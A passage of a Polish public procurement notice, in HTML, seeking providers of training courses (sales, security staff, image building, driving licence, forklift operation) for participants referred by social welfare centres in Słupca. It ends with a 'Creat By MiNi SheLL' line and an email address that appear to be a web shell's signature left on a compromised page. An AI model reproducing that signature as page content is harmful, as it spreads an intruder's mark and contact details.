odpowiedzialność przedsiębiorcy.3.Przygotowanie i przeprowadzenie kursu sprzedawcy z obsługą kasy fiskalnej dla 18 osób. Zakres zajęć: BHP, przepisy sanitarno-higieniczne i sanitarno-epidemiologiczne w obiekcie handlowym, zasady systemu HCCP,organizacja w handlu, towaroznawstwo, dokumentowanie sprzedaży, obsługa klienta, nowoczesne techniki sprzedaży, etyka i kultura zawodu sprzedawcy,programy  komputerowe wspomagające proces sprzedaży, fakturowanie komputerowe, obsługa kas fiskalnych i urządzeń współpracujących,marketing i reklama w handlu,aspekty prawne w procesie sprzedaży.4.Przygotowanie i przeprowadzenie kursu pracownik ochrony dla 8 osób. Zakres zajęć:zagadnienia prawne regulujące zasady wykonywania zadań pracownika ochrony, wybrane elementy prawa karnego, przepisy BHP, p.poż, zasady udzielania pomocy przedmedycznej,problematyka ochronna, podstawy technik samoobrony, techniki interwencyjne,wybrane elementy psychologii - techniki radzenia sobie ze stresem, reakcja w sytuacjach trudnych.5.Przygotowanie i przeprowadzenie kursu kreowania wizerunku dla 27 osób, w podziale na 2 grupy: I grupa - 12 osób, II grupa - 15 osób.Zakres zajęć:autoprezentacja, elementy savoir-vivre werbalne i niewerbalne elementy komunikacji, sposoby przełamywania barier komunikacyjnych,budowanie relacji, mowa ciała, wybrane elementy psychologii - techniki radzenia sobie ze stresem i z emocjami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> przygotowanie i przeprowadzenie kursu prawa jazdy kat. B  dla 11 osób, w tym 2 rodziców zastępczych skierowanych przez Powiatowe Centrum Pomocy Rodzinie w Słupcy, 4 uczestników skierowanych przez Gminny Ośrodek Pomocy Społecznej w Słupcy  oraz 5 uczestników skierowanych przez Miejski Ośrodek Pomocy Społecznej w Słupcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia teoretyczne powinny obejmować wykłady z zakresu:budowy, obsługi i eksploatacji samochodu osobowego, ogólnych zasad poruszania się samochodem po drodze: zachowanie ostrożności i właściwej postawy w stosunku do innych uczestników ruchu drogowego, zasad zachowania bezpiecznych odległości między pojazdami, środków wpływających na percepcję i szybkość reakcji (alkohol, narkotyki, leki), wpływ zmęczenia i stanu emocjonalnego na zachowanie kierowcy
oceny warunków na drodze - warunki atmosferyczne, widoczność, nawierzchnia, bezpieczna jazda samochodem w różnych warunkach bezpiecznego przewożenia pasażerów dorosłych i dzieci,znaków drogowych,ruszania, włączania się do ruchu, zatrzymania, postoju, manewrowania (wyprzedzanie, omijanie, wymijanie, zmiana pasa ruchu, skrzyżowania, ronda, ruchu kierowanego,używania świateł pojazdu, dokumentacji pojazdu, kontroli drogowej, udzielania pierwszej pomocy, zasad postępowania w razie uczestniczenia w wypadku lub kolizji drogowej, błędów najczęściej popełnianych przez kierowców, przygotowania do egzaminu teoretycznego, zajęcia praktyczne: budowa i obsługa samochodu,przygotowanie do jazdy, ruszanie, zatrzymanie, zmiana biegów, zmiana kierunku jazdy, cofanie, obsługa świateł, plac manewrowy - ćwiczenie umiejętności manewrowania pojazdem, jazda w terenie (dostosowanie prędkości do warunków na drodze, hamowanie awaryjne, bieg 5 i 6), jazda w ruchu ulicznym (pasy ruchu, skrzyżowania, ronda, obserwowanie i przewidywanie działań innych uczestników ruchu), manewry w ruchu ulicznym (wyprzedzanie, omijanie, wymijanie, parkowanie), jazda sportowa (wychodzenie z poślizgu, ostre wchodzenie w zakręty), jazda z nawigacją, stacja benzynowa (tankowanie benzyny, oleju napędowego, gazu), stacja kontroli pojazdów, czynności kontrolne na drodze, awaria na drodze (diagnostyka, zmiana koła, uzupełnienie płynów eksploatacyjnych),plac manewrowy - przygotowanie do egzaminu, trasy egzaminacyjne - przygotowanie do egzaminu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> przygotowanie i przeprowadzenie kursu obsługi wózków jezdniowych dla 5 osób, skierowanych przez Gminny Ośrodek Pomocy Społecznej w Słupcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zajęć:podział stosowanych wózków, budowa wózków, wiadomości z zakresu BHP, czynności operatora w trakcie i po zakończeniu pracy,bezpieczne użytkowanie butli w tym ich bezpieczna wymiana, wiadomości z zakresu ładunkoznawstwa, wiadomości o dozorze technicznym, zajęcia praktyczne, nauka jazdy i manewrowania osprzętem wózkowym, w tym wymiana butli gazowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com